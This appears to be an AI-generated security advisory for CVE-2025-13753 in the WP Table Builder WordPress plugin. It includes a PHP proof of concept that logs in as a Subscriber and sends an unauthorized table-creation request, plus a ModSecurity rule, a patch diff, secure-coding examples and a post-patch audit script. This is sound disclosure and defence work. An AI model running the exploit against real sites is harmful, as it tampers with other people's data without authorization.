Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-13753: WP Table Builder <= 2.0.19 – Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation (wp-table-builder)

Severity: Medium (CVSS 4.3)
CWE: 863
Vulnerable Version: 2.0.19
Patched Version: 2.0.20
Disclosed: January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13753:

This vulnerability is an incorrect authorization flaw (CWE-863) in the WP Table Builder plugin for WordPress. It allows authenticated users with Subscriber-level permissions or higher to create new table posts, an action intended for higher-privileged users. All plugin versions up to and including 2.0.19 are affected.

The root cause is an insufficient authorization check in the `save_table()` function in `/wp-table-builder/inc/admin/class-admin-menu.php`. The original code at line 75 only verified a nonce and checked whether the user had the `Settings_Manager::ALLOWED_ROLE_META_CAP` capability. That capability check was insufficient to restrict the function to authorized users, because lower-privileged roles could also satisfy it.

Exploitation involves an authenticated attacker with Subscriber access sending a POST request to the WordPress admin AJAX endpoint, targeting the `wp_ajax_wptb_save_table` action hook. The request must carry a valid `security_code` nonce, which a Subscriber can obtain from their own session, together with table data in the request body. The attack vector is `POST /wp-admin/admin-ajax.php` with the parameter `action=wptb_save_table`.

The patch adds a proper authorization check at the beginning of `save_table()`: a call to `WPTableBuilderAdminAuthorization::can_edit()` before any other logic, terminating the script if the check fails. The patch also removes the flawed `current_user_can(Settings_Manager::ALLOWED_ROLE_META_CAP)` check from the nonce verification line, relying solely on the new authorization method.

Successful exploitation allows an attacker to create arbitrary `wptb-table` custom post type entries, which constitutes unauthorized data modification. While this does not directly lead to remote code execution or site takeover, it can pollute the database, disrupt site content, and serve as a stepping stone in a broader attack chain aimed at privilege escalation or data integrity attacks.

PoC (PHP)

<?php
// Atomic Edge CVE Research – Proof of Concept
// CVE-2025-13753 – WP Table Builder <= 2.0.19 – Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation

// Target and Subscriber-level credentials. These are placeholders to be set for a test environment.
$target_url = 'http://TARGET_SITE_PLACEHOLDER';
$username   = 'SUBSCRIBER_USERNAME_PLACEHOLDER';
$password   = 'SUBSCRIBER_PASSWORD_PLACEHOLDER';
$login_url  = $target_url . '/wp-login.php';
// The handler reads a JSON body, so the action is passed in the query string.
$ajax_url   = $target_url . '/wp-admin/admin-ajax.php?action=wptb_save_table';

// Step 1: Log in as the Subscriber and store the session cookies.
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_HEADER => true
]);
$response = curl_exec($ch);

// Step 2: Fetch the WP Table Builder page to extract a security nonce.
// The nonce is typically found in page scripts or data attributes.
// This example assumes a nonce can be retrieved from a known script pattern.
// In a real scenario, you would parse the page HTML for 'wptb-security-nonce'.
$placeholder_nonce = 'EXTRACTED_NONCE_PLACEHOLDER';
// For the PoC, we simulate a valid nonce. An actual exploit would extract it.

// Step 3: Craft the malicious request to create a table.
$table_data = json_encode([
    'security_code' => $placeholder_nonce,
    'table_data' => '[["Malicious Cell"]]',
    'table_title' => 'Atomic Edge Exploit Table'
]);

curl_setopt_array($ch, [
    CURLOPT_URL => $ajax_url,
    CURLOPT_HTTPHEADER => ['Content-Type: application/json'],
    CURLOPT_POSTFIELDS => $table_data,
    CURLOPT_POST => true,
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HEADER => false
]);

$ajax_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Step 4: Check the response.
echo "HTTP Code: $http_code\n";
echo "Response: $ajax_response\n";
if ($http_code == 200 && strpos($ajax_response, 'table_id') !== false) {
    echo "[+] Table creation likely successful.\n";
} else {
    echo "[-] Exploit may have failed.\n";
}

?>

ModSecurity Rule

# Atomic Edge WAF Rule – CVE-2025-13753
# REQUEST_FILENAME is the path without the query string; REQUEST_URI would include
# "?action=wptb_save_table" and never match an exact string comparison.
# ARGS covers both query-string and body parameters. Because the handler reads a JSON
# body, ARGS:security_code is only populated when the JSON request body processor is
# enabled for application/json requests (ctl:requestBodyProcessor=JSON in a phase:1 rule).
# A WAF cannot see the WordPress role behind a session cookie, so this rule blocks every
# wptb_save_table request, including legitimate admin ones; treat it as a temporary
# virtual patch until 2.0.20 is deployed.
SecRule REQUEST_FILENAME "@streq /wp-admin/admin-ajax.php" \
    "id:100013753,phase:2,deny,status:403,chain,msg:'CVE-2025-13753 via WP Table Builder AJAX – Unauthorized Table Creation',severity:'MEDIUM',tag:'CVE-2025-13753',tag:'WordPress',tag:'WP_Table_Builder'"
    SecRule ARGS:action "@streq wptb_save_table" "chain"
    SecRule &ARGS:security_code "!@eq 0" "chain"
    SecRule &REQUEST_HEADERS:Authorization "@eq 0" \
        "t:none,setvar:'tx.cve_2025_13753_block=1'"

SecRule TX:cve_2025_13753_block "@eq 1" \
    "id:100013754,phase:2,deny,status:403,msg:'CVE-2025-13753 Block – Unauthenticated/Subscriber access to wptb_save_table',severity:'MEDIUM',tag:'CVE-2025-13753'"
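The analysis above comes down to one lesson: a nonce proves that a request was issued from a page the site served to this user (a CSRF control), and it says nothing about the user's privilege level. Authorization has to be a separate capability check that runs before the body is read. The following is an added example of that pattern for a WordPress AJAX save handler; it is not WP Table Builder code. The action name `myplugin_save_table`, the post type `myplugin_table`, the nonce action `myplugin-security-nonce` and the meta key are hypothetical; `edit_posts` is the standard WordPress capability that the Subscriber role lacks.

```php
<?php
// Added example, not the plugin's code: a WordPress AJAX save handler that keeps
// authorization (capability) and CSRF protection (nonce) as two distinct checks.
// Hypothetical names: action 'myplugin_save_table', post type 'myplugin_table',
// nonce action 'myplugin-security-nonce', meta key '_myplugin_table_rows'.

add_action('wp_ajax_myplugin_save_table', 'myplugin_save_table');

function myplugin_save_table() {
    // 1. Authorization first, before the request body is even read.
    //    Subscribers only hold 'read', so they are rejected here with a real 403.
    if (!current_user_can('edit_posts')) {
        wp_send_json_error(['message' => 'insufficient privileges'], 403);
    }

    // 2. Parse the JSON body defensively: json_decode() returns null on bad input,
    //    so property access on the result must not be attempted blindly.
    $raw    = file_get_contents('php://input');
    $params = json_decode($raw, true);
    if (!is_array($params) || empty($params['security_code'])) {
        wp_send_json_error(['message' => 'malformed request'], 400);
    }

    // 3. Nonce check (CSRF). wp_verify_nonce() returns false, 1 or 2; it never throws.
    if (!wp_verify_nonce($params['security_code'], 'myplugin-security-nonce')) {
        wp_send_json_error(['message' => 'security_problem'], 403);
    }

    // 4. Validate and sanitize what will be stored. The title becomes post_title;
    //    the table body must decode to a JSON array before it is kept as post meta.
    $title = isset($params['table_title']) ? sanitize_text_field($params['table_title']) : '';
    $rows  = isset($params['table_data']) ? json_decode($params['table_data'], true) : null;
    if ($title === '' || !is_array($rows)) {
        wp_send_json_error(['message' => 'invalid table data'], 400);
    }

    // 5. Create the post as the current user so post_author records who did it,
    //    which is what a later audit will rely on.
    $post_id = wp_insert_post([
        'post_type'   => 'myplugin_table',
        'post_title'  => $title,
        'post_status' => 'publish',
        'post_author' => get_current_user_id(),
    ], true);
    if (is_wp_error($post_id)) {
        wp_send_json_error(['message' => $post_id->get_error_message()], 500);
    }
    update_post_meta($post_id, '_myplugin_table_rows', wp_json_encode($rows));

    wp_send_json_success(['table_id' => $post_id]);
}
```

The `wp_send_json_*` helpers terminate the request with an explicit HTTP status, so a 403 from the capability check is visible to reverse proxies and log monitoring, whereas a `wp_die()` carrying an ad hoc array hides the failure inside the response body.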

Differential between vulnerable and patched code

Code Diff
--- a/wp-table-builder/inc/admin/class-admin-menu.php
+++ b/wp-table-builder/inc/admin/class-admin-menu.php
@@ -68,9 +68,14 @@

 	public function save_table()
 	{
+
+		if (!WPTableBuilderAdminAuthorization::can_edit()) {
+			wp_die(json_encode(['security_problem', '']));
+		}
+
 		$params = json_decode(file_get_contents('php://input'));

-		$verified = current_user_can(Settings_Manager::ALLOWED_ROLE_META_CAP) && wp_verify_nonce($params->security_code, 'wptb-security-nonce');
+		$verified = wp_verify_nonce($params->security_code, 'wptb-security-nonce');
 		$import_verified = wp_verify_nonce($params->security_code, 'wptb-import-security-nonce');

 		if (!$verified && !$import_verified) {
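Review bot: `$params->security_code` on the line `$verified = wp_verify_nonce($params->security_code, 'wptb-security-nonce');` is dereferenced without checking that `json_decode(file_get_contents('php://input'))` produced an object; an empty or malformed body yields `null` and a PHP warning before the nonce check runs. This is pre-existing, but since the function is being touched, a guard such as `if (!is_object($params) || empty($params->security_code)) { wp_die(json_encode(['security_problem', ''])); }` before the `$verified` line would close it. Also note that with `current_user_can(Settings_Manager::ALLOWED_ROLE_META_CAP)` removed, `WPTableBuilderAdminAuthorization::can_edit()` is now the sole authorization control and its implementation is not in this diff, so the review should confirm it requires a capability the Subscriber role does not hold. Finally, `wp_die(json_encode(['security_problem', '']))` returns a bare array; `wp_send_json_error(..., 403)` would give callers and monitoring an explicit status code.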
--- a/wp-table-builder/v2/inc/WPTableBuilder.php
+++ b/wp-table-builder/v2/inc/WPTableBuilder.php
@@ -10,7 +10,7 @@
 class WPTableBuilder
 {

-    const VERSION = '2.0.19';
+    const VERSION = '2.0.20';

     public static function init()
     {
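Review bot: the version string is maintained by hand in three places (`const VERSION` here, the `Version:` plugin header and `$current_version` in wp-table-builder.php), and all three are bumped separately in this patch. Having the header parsed once (or the other two locations read `WPTableBuilder::VERSION`) would prevent a future security release from shipping with mismatched version numbers, which matters because update checks and vulnerability scanners key on them.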
--- a/wp-table-builder/wp-table-builder.php
+++ b/wp-table-builder/wp-table-builder.php
@@ -16,7 +16,7 @@
  * Plugin Name:       WP Table Builder
  * Plugin URI:        https://wptablebuilder.com/
  * Description:       Drag and Drop Responsive Table Builder Plugin for WordPress.
- * Version:           2.0.19
+ * Version:           2.0.20
  * Author:            WP Table Builder
  * Author URI:        https://wptablebuilder.com//
  * License:           GPL-3.0+
@@ -97,7 +97,7 @@
      * Define Constants
      */

-    $current_version = '2.0.19';
+    $current_version = '2.0.20';


     define(__NAMESPACE__ . 'NS', __NAMESPACE__ . '\');
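Applying 2.0.20 stops further unauthorized table creation but does not tell you whether the flaw was already used. The following is an added example, not WP Table Builder code, of a post-patch audit that lists `wptb-table` posts whose author lacks the capability a privileged editor would have; it is meant to be run inside WordPress with WP-CLI (`wp eval-file wptb-audit.php`). The post type name `wptb-table` is taken from the advisory; that `post_author` records the account that created the table is an assumption about the plugin (the advisory does not say), and `edit_posts` is used as the baseline capability a Subscriber lacks, since the plugin's own `can_edit()` rule is not shown in the diff. The function name `wptb_audit_low_priv_tables` is hypothetical.

```php
<?php
// Added example, not the plugin's code: after upgrading to 2.0.20, find wptb-table
// posts authored by accounts that lack the capability an editor would hold.
// Assumptions: post_author reflects the creating account (not confirmed by the
// advisory); 'edit_posts' approximates the plugin's can_edit() requirement.
// Run with: wp eval-file wptb-audit.php

function wptb_audit_low_priv_tables($required_cap = 'edit_posts') {
    $suspect = [];
    $ids = get_posts([
        'post_type'   => 'wptb-table',
        'post_status' => 'any',   // include drafts and trashed entries
        'numberposts' => -1,
        'fields'      => 'ids',
    ]);
    foreach ($ids as $id) {
        $author_id = (int) get_post_field('post_author', $id);
        $user      = get_userdata($author_id);
        // A deleted author, or an author without the capability, needs a look.
        if (!$user || !user_can($author_id, $required_cap)) {
            $suspect[] = [
                'post_id' => $id,
                'created' => get_post_field('post_date_gmt', $id),
                'author'  => $user ? $user->user_login : "deleted user #$author_id",
                'roles'   => $user ? implode(',', $user->roles) : '',
            ];
        }
    }
    return $suspect;
}

$hits = wptb_audit_low_priv_tables();
if (!$hits) {
    echo "No wptb-table posts authored by accounts lacking edit_posts.\n";
} else {
    foreach ($hits as $h) {
        printf("post %d created %s by %s (roles: %s)\n",
            $h['post_id'], $h['created'], $h['author'], $h['roles']);
    }
    echo "Review these tables and the accounts that created them; they may be exploitation artefacts.\n";
}
```

Correlate any hit's `post_date_gmt` with web server logs for `POST /wp-admin/admin-ajax.php` requests carrying `action=wptb_save_table` from the same session window; the ModSecurity rule in the analysis above, if deployed, logs these under rule id 100013753.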

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
